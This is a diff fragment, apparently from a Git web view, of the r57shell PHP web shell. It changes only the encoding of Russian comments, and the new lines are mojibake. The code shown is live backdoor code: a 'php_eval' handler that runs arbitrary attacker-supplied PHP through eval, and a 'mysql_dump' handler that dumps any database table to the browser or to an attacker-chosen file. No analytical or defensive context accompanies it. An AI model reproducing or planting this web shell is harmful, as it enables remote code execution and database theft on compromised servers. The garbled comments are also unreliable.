/*** END base64 ------------------------------------------------------------------------------------------------ */
|
||||
|
||||
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
||||
|
@ -1468,7 +1450,7 @@ else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
|
|||
|
||||
}
|
||||
|
||||
// не зависит от сейфа
|
||||
// íå çàâèñèò îò ñåéôà
|
||||
if ($_POST['cmd']=="php_eval")
|
||||
{
|
||||
$eval = @str_replace("<?","",$_POST['php_eval']);
|
||||
|
@ -1476,7 +1458,7 @@ if ($_POST['cmd']=="php_eval")
|
|||
@eval($eval);
|
||||
}
|
||||
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
||||
/* mysql дамп */
|
||||
/* mysql äàìï */
|
||||
if ($_POST['cmd']=="mysql_dump")
|
||||
{
|
||||
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
|
||||
|
@ -1487,7 +1469,7 @@ if ($_POST['cmd']=="mysql_dump")
|
|||
|
||||
if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||
{
|
||||
// инфа о дампе
|
||||
// èíôà î äàìïå
|
||||
$sql1 = "# MySQL dump created by r57shell\r\n";
|
||||
$sql1 .= "# homepage: http://rst.void.ru\r\n";
|
||||
$sql1 .= "# ---------------------------------\r\n";
|
||||
|
@ -1496,7 +1478,7 @@ if ($_POST['cmd']=="mysql_dump")
|
|||
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
|
||||
$sql1 .= "# ---------------------------------\r\n\r\n";
|
||||
|
||||
// получаем текст запроса создания структуры таблицы
|
||||
// ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
|
||||
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
|
||||
$row = @mysql_fetch_row($res);
|
||||
$sql1 .= $row[1]."\r\n\r\n";
|
||||
|
@ -1504,7 +1486,7 @@ if ($_POST['cmd']=="mysql_dump")
|
|||
|
||||
$sql2 = '';
|
||||
|
||||
// получаем данные таблицы
|
||||
// ïîëó÷àåì äàííûå òàáëèöû
|
||||
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
|
||||
if (@mysql_num_rows($res) > 0) {
|
||||
while ($row = @mysql_fetch_assoc($res)) {
|
||||
|
@ -1516,7 +1498,7 @@ if ($_POST['cmd']=="mysql_dump")
|
|||
}
|
||||
$sql2 .= "\r\n# ---------------------------------";
|
||||
}
|
||||
// пишем в файл или выводим в браузер
|
||||
// ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
|
||||
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
|
||||
else { echo $sql1.$sql2; }
|
||||
} // end if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||
|
|
Loading…
Reference in a new issue